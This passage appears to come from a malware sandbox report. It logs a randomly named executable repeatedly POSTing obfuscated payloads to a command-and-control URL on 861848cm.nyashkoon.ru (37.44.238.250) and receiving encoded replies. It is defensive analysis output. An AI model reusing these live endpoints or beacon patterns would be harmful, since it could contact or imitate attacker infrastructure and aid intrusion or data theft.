                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:37.922621965 CET1024OUTData Raw: 56 53 5a 5a 56 5e 50 5f 5a 5f 52 51 54 59 5b 5d 55 57 59 5c 51 57 52 53 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VSZZV^P_Z_RQTY[]UWY\QWRSTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%\,,1((?< (()")['^$X7-).Z9&8#72^1'X$.Q-*
                                                                                            Nov 5, 2024 23:53:38.367151022 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:38.448431015 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:36 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            73192.168.2.45000037.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:38.571167946 CET309OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:53:38.930572987 CET1024OUTData Raw: 53 55 5a 58 56 5d 55 58 5a 5f 52 51 54 59 5b 59 55 53 59 5b 51 50 52 5a 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SUZXV]UXZ_RQTY[YUSY[QPRZTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%8<>R=8X(;>:>-:_'("<9+>0:8]472)'X$.Q-*
                                                                                            Nov 5, 2024 23:53:39.403111935 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:39.479218006 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:37 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            74192.168.2.45000537.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:39.607063055 CET309OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:53:39.961740017 CET1024OUTData Raw: 56 51 5a 5c 56 56 50 5f 5a 5f 52 51 54 5b 5b 52 55 56 59 5b 51 53 52 5b 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VQZ\VVP_Z_RQT[[RUVY[QSR[TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%^/?2=; < #*\-[)>>$^4[ >?<.<^7-2'X$.Q-"
                                                                                            Nov 5, 2024 23:53:40.421107054 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:40.496970892 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:38 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            75192.168.2.45001037.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:40.918225050 CET309OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:53:41.274229050 CET1024OUTData Raw: 56 57 5a 5e 53 5b 55 59 5a 5f 52 51 54 52 5b 5a 55 56 59 58 51 5e 52 53 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VWZ^S[UYZ_RQTR[ZUVYXQ^RSTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%;?2V?; _>37)\"=>!08,^#?)+X<.C,_!4%1'X$.Q-
                                                                                            Nov 5, 2024 23:53:41.716995001 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:41.794312954 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:39 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            76192.168.2.45001537.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:41.923048019 CET309OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:53:42.275177956 CET1024OUTData Raw: 53 53 5a 58 53 5b 50 5b 5a 5f 52 51 54 58 5b 5b 55 55 59 5f 51 54 52 52 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SSZXS[P[Z_RQTX[[UUY_QTRRTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%,,6+8 Y?3(:&=>%'8,X Y!?=7X-5#4:&9'X$.Q-.
                                                                                            Nov 5, 2024 23:53:42.757452965 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:42.855514050 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:40 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            77192.168.2.45002037.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:43.024485111 CET309OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:53:43.384203911 CET1024OUTData Raw: 56 54 5a 5c 56 5a 55 59 5a 5f 52 51 54 5d 5b 5c 55 57 59 5f 51 5e 52 58 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VTZ\VZUYZ_RQT][\UWY_Q^RXTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&/<.V?0\?3(]>5?-"0( Z >(.4,&;#1'X$.Q-


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            78192.168.2.45002137.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:43.384138107 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1252
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:43.742974043 CET1252OUTData Raw: 56 50 5a 58 53 58 55 5f 5a 5f 52 51 54 5a 5b 5b 55 5d 59 5f 51 51 52 5c 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VPZXSXU_Z_RQTZ[[U]Y_QQR\TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&,Y"V?^ ^(=)X)[:084[ -(-(,%8Y Y%'X$.Q-"
                                                                                            Nov 5, 2024 23:53:44.202153921 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:44.279257059 CET308INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:42 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 00 1e 20 15 3c 3a 26 5e 24 2b 38 55 3e 07 21 58 3c 23 3b 5d 2f 1c 02 5a 3d 0a 20 10 29 01 20 18 20 11 01 5c 21 31 29 58 23 32 30 07 2b 2b 21 5f 05 1d 3a 06 33 39 09 09 2a 0b 26 5c 3d 09 0e 46 32 0e 2c 42 2a 05 25 01 34 03 3a 1c 32 3d 21 5b 26 0c 0a 0d 2b 27 3a 06 2c 3f 23 56 31 3a 2a 57 09 16 20 57 27 55 23 5f 2a 32 20 02 24 10 3e 06 31 3a 3b 11 3d 12 3f 5b 37 1a 2d 01 29 55 23 12 35 37 2a 13 33 2a 31 18 24 2d 2b 19 3c 32 26 55 22 0d 20 54 01 30 5d 4f
                                                                                            Data Ascii: <:&^$+8U>!X<#;]/Z= ) \!1)X#20++!_:39*&\=F2,B*%4:2=![&+':,?#V1:*W W'U#_*2 $>1:;=?[7-)U#57*3*1$-+<2&U" T0]O


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            79192.168.2.45002637.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:43.746331930 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:44.102513075 CET1024OUTData Raw: 56 52 5f 5c 56 5f 55 58 5a 5f 52 51 54 5c 5b 5b 55 53 59 57 51 52 52 5c 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VR_\V_UXZ_RQT\[[USYWQRR\TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%^,/!+3+3 Y>:!)[:]$((Y",:W(>-C<\4>\'9'X$.Q->
                                                                                            Nov 5, 2024 23:53:44.575453997 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:44.643115044 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:42 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            80192.168.2.45003137.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:44.778188944 CET309OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:53:45.133630991 CET1024OUTData Raw: 53 52 5a 59 56 5e 55 58 5a 5f 52 51 54 5b 5b 5e 55 55 59 59 51 54 52 5d 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SRZYV^UXZ_RQT[[^UUYYQTR]TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&8/-=88?Y)**>:_'8+"<2W(<-<#Q.29'X$.Q-"
                                                                                            Nov 5, 2024 23:53:45.600760937 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:45.677596092 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:43 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            81192.168.2.45003637.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:46.269557953 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:46.618068933 CET1024OUTData Raw: 53 55 5f 59 56 5b 50 5d 5a 5f 52 51 54 5d 5b 58 55 5c 59 5a 51 5e 52 5f 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SU_YV[P]Z_RQT][XU\YZQ^R_TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%]-<-=8+ (Y>9-=-*[%;# %('-C##2Y%9'X$.Q-
                                                                                            Nov 5, 2024 23:53:47.092099905 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:47.166616917 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:45 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            82192.168.2.45004437.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:47.305111885 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:47.649462938 CET1024OUTData Raw: 56 55 5a 5e 53 5f 55 58 5a 5f 52 51 54 5f 5b 5a 55 56 59 57 51 57 52 5a 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VUZ^S_UXZ_RQT_[ZUVYWQWRZTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&,R?<3<(*^=>&\%;<_7/)=<-6<_7Y%'X$.Q-2
                                                                                            Nov 5, 2024 23:53:48.119100094 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:48.195221901 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:46 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            83192.168.2.45005037.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:48.904880047 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:49.258594990 CET1024OUTData Raw: 56 53 5a 5c 53 5c 50 5a 5a 5f 52 51 54 53 5b 5e 55 53 59 58 51 52 52 5f 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VSZ\S\PZZ_RQTS[^USYXQRR_TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%^/?>W(;>37()6*=*\%( Y 1(,-% 7')'X$.Q-


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            84192.168.2.45005537.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:49.296624899 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1272
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:49.649305105 CET1272OUTData Raw: 53 56 5a 5c 56 57 50 5c 5a 5f 52 51 54 5a 5b 5c 55 55 59 5c 51 52 52 53 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SVZ\VWP\Z_RQTZ[\UUY\QRRSTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%;Y-=(+<4[=:5Y==%3^#?%?,%$^#!&'X$.Q->
                                                                                            Nov 5, 2024 23:53:50.144279957 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:50.220345974 CET308INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:48 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 00 1e 23 05 3f 3a 22 5e 26 2b 38 54 3d 3d 31 5a 29 30 24 05 2d 31 34 5a 29 55 33 04 2b 38 27 0c 34 59 2b 5c 35 0c 21 5d 20 54 2f 12 2b 3b 21 5f 05 1d 39 11 26 39 33 0d 29 1c 2a 5e 3d 24 20 0b 27 30 34 0b 28 2b 36 5d 20 04 0b 0a 32 3d 32 00 32 31 28 0b 2b 0a 04 06 2d 11 23 57 32 3a 2a 57 09 16 23 09 25 33 27 13 29 22 38 03 33 3e 13 10 24 39 3b 1e 3d 3c 06 00 23 27 3d 05 3e 23 0a 00 22 0e 32 5d 24 03 3d 1b 26 07 23 51 28 22 26 55 22 0d 20 54 01 30 5d 4f
                                                                                            Data Ascii: #?:"^&+8T==1Z)0$-14Z)U3+8'4Y+\5!] T/+;!_9&93)*^=$ '04(+6] 2=221(+-#W2:*W#%3')"83>$9;=<#'=>#"2]$=&#Q("&U" T0]O


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            85192.168.2.45005637.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:49.428416014 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:49.774255991 CET1024OUTData Raw: 53 56 5f 58 56 5b 50 5c 5a 5f 52 51 54 5e 5b 53 55 5c 59 5e 51 55 52 53 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SV_XV[P\Z_RQT^[SU\Y^QURSTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%^/.V?((<3*9*==$4Z#?<>(:+#$>X2)'X$.Q-6
                                                                                            Nov 5, 2024 23:53:50.230333090 CET25INHTTP/1.1 100 Continue
